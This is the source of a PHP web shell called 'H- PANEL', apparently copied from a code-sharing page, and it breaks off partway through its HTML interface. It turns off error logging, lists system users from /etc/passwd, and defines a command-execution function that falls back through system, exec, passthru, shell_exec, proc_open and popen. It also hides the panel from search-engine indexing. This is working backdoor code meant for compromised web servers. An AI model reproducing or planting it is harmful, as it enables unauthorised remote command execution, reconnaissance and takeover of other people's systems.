<?php
// H- PANEL
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('display_errors', 0);
@error_reporting(0);
@error_log(false);
$slash = '/';
if(strtolower(substr(PHP_OS,0,3))=='win'){ $os = 'win'; $slash = '\\'; $ox = "Windows";}else{ $os = "nix"; $ox = "Linux"; }
function sanitize($object){
return filter_var(htmlspecialchars($object), FILTER_SANITIZE_STRING);
}
function get_users(){
$users = array();
$user = file("/etc/passwd");
foreach ($user as $userx => $userz) {
$userct = explode(":", $userz);
array_push($users,$userct[0]);
}
if(!$user){
if($open = opendir("/home/")){
while(($file = readdir($open)) !== false){ array_push($users, $file); }
}
closedir($open);
}
$users = implode(', ', $users);
return $users;
}
function exe($cmd){
if(function_exists('system')) {
@ob_start();
@system($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
}elseif(function_exists('exec')) {
@exec($cmd,$results);
$buff = join("\n", $results);
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('shell_exec')) {
$buff = @shell_exec($cmd);
}elseif(function_exists('proc_open')){
$desc = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
$handle = proc_open($cmd, $desc, $pipes);
if(is_resource($handle)){
if(function_exists('fread') && function_exists('feof')){
while(!feof($pipes[1])){ $buff .= fread($pipes[1], 512); }
}elseif(function_exists('fgets') && function_exists('feof')){
while(!feof($pipes[1])){ $buff .= fgets($pipes[1], 512); }
}
}
pclose($handle);
}elseif(function_exists('popen')){
$handle = popen($cmd, "r");
if(is_resource($handle)){
if(function_exists('fread') && function_exists('feof')){
while(!feof($handle)){ $buff .= fread($handle, 512); }
}elseif(function_exists('fgets') && function_exists('feof')){
while(!feof($handle)){ $buff .= fgets($handle, 512); }
}
}
pclose($handle);
}
$buff = wordwrap(htmlspecialchars($buff));
return $buff;
}
echo "
<!DOCTYPE html>
<html>
<head>
<link rel=\"shortcut icon\" href=\"http://i.imgur.com/iuhnNKU.png\" />
<meta name=\"ROBOTS\" content=\"NOINDEX, NOFOLLOW, NOARCHIVE\" />
<meta name=\"GOOGLEBOT\" content=\"NOINDEX, NOFOLLOW, NOARCHIVE\" />
<meta charset=\"UTF-8\">
<script type=\"text/javascript\" src=\"http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js\"></script>
<link href='http://fonts.googleapis.com/css?family=Monoton' rel='stylesheet' type='text/css'>
<title>:~H- PANEL ~:</title>
<style>
@import url(\"http://fonts.googleapis.com/css?family=Iceberg:400\");
*, body, html { text-shadow: 0px 0px 1px #141414; cursor: url(http://cur.cursors-4u.net/cursors/cur-9/cur863.ani), url(http://cur.cursors-4u.net/cursors/cur-9/cur863.png), default !important;}
html {font-family: 'Iceberg';}
.chekwa{ display: none;}
.wala { border-bottom: none;}
input { border: none; background: none; font-family: 'Courier New';}
textarea{ background: #111111; font-family: 'Courier New'; font-size: 15px; border: 1px dashed lime; border-radius: 15px; padding: 10px; color: white;}
.submit{ background: lime; color: black; }
select{ background: lime; color: black; font-family: 'Courier New'; border: none;}
option{ font-family: 'Courier New'; background: lime; border: none;}
.titulo {text-shadow: 0pt 0pt 0.99em lime, 0pt 0pt 0.99em lime;color: #00ff00;text-decoration: none;}
body { background: #111111; color: white; text-align : center;}
.foot{ position: relative; width: 100%; bottom: 0;}
a { color: white; text-decoration: none;}
#details{ -moz-border-radius: 10px; border-radius: 10px; border:1px solid green; padding:4px 8px; line-height:16px; background:#111111; color:#aaa; margin:0 0 8px 0; min-height:100px; margin-top: 10px;}
tr:hover { background: #141414;}
a:hover { text-shadow: 0pt 0pt 0.99em lime, 0pt 0pt 0.99em lime;color: #00ff00;text-decoration: none; }
.lamesa, .mesa { width:100%; padding:4px 0; color:white; font-size:15px;}
.mesa td{ border-bottom:1px solid #222222; padding:0 8px; line-height:24px; vertical-align:top;}
.board {text-align: center;border: 1px solid rgba(255,180,0,0.4);border-radius: 4px;width: 500px;font-family: 'Monoton'}
.board p {font-size: 65px;font-family: 'Monoton', cursive;color: #fff;text-transform: uppercase;padding: 0;margin: 0;}
pre { text-align: left;}
.pare{ border: 1px dashed lime; border-radius: 15px; color: #9b9b9b; font-size: 15px; font-family: 'Courier New'; padding: 15px;}
textarea:focus{ outline: none;}
.piktur { width: 60px; cursor: pointer; opacity: .5; transition: .5s ease-in-out;}
.piktur:hover { opacity: 1; width: 75px;}
code { font-family: monospace; }
</style>";?>
<script type="text/javascript">
$(document).ready(function() {$('#spade').novacancy({'reblinkProbability': 0.1,'blinkMin': 0.2,'blinkMax': 0.6,'loopMin': 8,'loopMax': 10,'color': '#ffffff','glow': ['0 0 80px #ffffff', '0 0 30px #008000', '0 0 6px #0000ff']});
$('#pirates').novacancy({'blink': 1,'off': 1,'color': 'Red','glow': ['0 0 80px Red', '0 0 30px FireBrick', '0 0 6px DarkRed']});});
</script>
<?php echo "
</head>
<body>
<noscript><meta http-equiv=\"refresh\" content=\"0; URL=http://xbox.nu/sssssssssssppppppppppaaaaaaaaaaaadddddddeeeeeeeee.html\"></noscript>
<center><div class=\"board\" style=\"width: 30%;\"><p id=\"spade\">H-</p><p id=\"pirates\">PANEL </p></div></center>

Next
Pg.: 1 2 3 4 5


Back to home | File page

Subscribe | Register | Login | N